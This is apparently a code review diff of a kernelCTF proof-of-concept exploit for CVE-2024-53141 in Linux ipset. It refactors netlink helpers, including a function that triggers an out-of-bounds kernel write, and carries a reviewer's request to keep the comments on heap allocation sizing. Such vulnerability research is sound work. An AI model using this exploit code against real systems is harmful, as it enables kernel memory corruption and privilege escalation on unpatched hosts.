pocs/linux/kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c

```diff
@@ -196,198 +196,145 @@ int netlink_open(int proto)
-
-	// map size depend on map = ip_set_alloc(sizeof(*map) + elements * set->dsize);
-	// IPSET_FLAG_WITH_COUNTERS cause set->dsize == 0x10
-	// 0x40*0x10 + sizeof(*map) is under kmalloc-cg-2048
+	{
+		mnl_attr_put_u32(nlh, IPSET_ATTR_CADT_FLAGS | NLA_F_NET_BYTEORDER,
+						 htonl(IPSET_FLAG_WITH_COUNTERS));
+	}
 
 	mnl_attr_nest_end(nlh, attr_data);
-
 	return netlink_send(sock_fd, nlh);
 }
+
 // Function to add an IP address to the set
-int add_ip_to_set(int sock_fd, const char *set_name, uint8_t family,uint32_t ip)
+int add_ip_to_set(int sock_fd, const char *set_name, uint8_t family, uint32_t ip)
 {
-
 	char buf[1024];
-	struct nlmsghdr *nlh = mnl_nlmsg_put_header(buf);
-
-	nlh->nlmsg_type = IPSET_CMD_ADD | (NFNL_SUBSYS_IPSET << NFNL_SUBSYS_ID_SHIFT);
-	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_EXCL;
-
-	mnl_nlmsg_put_extra_header(nlh, 4);
-
-	mnl_attr_put_u8(nlh, IPSET_ATTR_PROTOCOL, IPSET_PROTOCOL);
-	mnl_attr_put_strz(nlh, IPSET_ATTR_SETNAME, set_name);
-
-	mnl_attr_put_u8(nlh, IPSET_ATTR_FAMILY, family);
-	mnl_attr_put_u8(nlh, IPSET_ATTR_REVISION, 0);
+	struct nlmsghdr *nlh = setup_ip_set_message(buf, IPSET_CMD_ADD | (NFNL_SUBSYS_IPSET << NFNL_SUBSYS_ID_SHIFT),
+												NLM_F_REQUEST | NLM_F_ACK | NLM_F_EXCL,
+												set_name, NULL, family, 4);
 
 	struct nlattr *attr_data = mnl_attr_nest_start(nlh, IPSET_ATTR_DATA);
-
 	struct nlattr *attr_ip = mnl_attr_nest_start(nlh, IPSET_ATTR_IP);
-
 	mnl_attr_put_u32(nlh, IPSET_ATTR_IPADDR_IPV4 | NLA_F_NET_BYTEORDER, ip);
-
 	mnl_attr_nest_end(nlh, attr_ip);
 
 	attr_ip = mnl_attr_nest_start(nlh, IPSET_ATTR_IP_TO);
 	mnl_attr_put_u32(nlh, IPSET_ATTR_IPADDR_IPV4 | NLA_F_NET_BYTEORDER, ip);
 	mnl_attr_nest_end(nlh, attr_ip);
 
 	mnl_attr_nest_end(nlh, attr_data);
-
 	return netlink_send(sock_fd, nlh);
 }
 
 int trigger_oob_write(int sock_fd, const char *set_name, uint8_t family)
 {
-
 	char buf[1024];
-	struct nlmsghdr *nlh = mnl_nlmsg_put_header(buf);
-
-	nlh->nlmsg_type = IPSET_CMD_ADD | (NFNL_SUBSYS_IPSET << NFNL_SUBSYS_ID_SHIFT);
-	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_EXCL;
-
-	mnl_nlmsg_put_extra_header(nlh, 4);
-
-	mnl_attr_put_u8(nlh, IPSET_ATTR_PROTOCOL, IPSET_PROTOCOL);
-	mnl_attr_put_strz(nlh, IPSET_ATTR_SETNAME, set_name);
-
-	mnl_attr_put_u8(nlh, IPSET_ATTR_FAMILY, family);
-	mnl_attr_put_u8(nlh, IPSET_ATTR_REVISION, 0);
+	struct nlmsghdr *nlh = setup_ip_set_message(buf, IPSET_CMD_ADD | (NFNL_SUBSYS_IPSET << NFNL_SUBSYS_ID_SHIFT),
+												NLM_F_REQUEST | NLM_F_ACK | NLM_F_EXCL,
+												set_name, NULL, family, 4);
 
 	struct nlattr *attr_data = mnl_attr_nest_start(nlh, IPSET_ATTR_DATA);
-
 	struct nlattr *attr_ip = mnl_attr_nest_start(nlh, IPSET_ATTR_IP);
-
 	mnl_attr_put_u32(nlh, IPSET_ATTR_IPADDR_IPV4 | NLA_F_NET_BYTEORDER, htonl(-1));
-
 	mnl_attr_nest_end(nlh, attr_ip);
 
-	// IPSET_ATTR_CIDR==3 make `ip` is 0xe0000000 and `ip_to` 0xffffffff
```

Comment:
Please do not remove these very useful comments. Without these, it's much harder to understand what's allocated and where.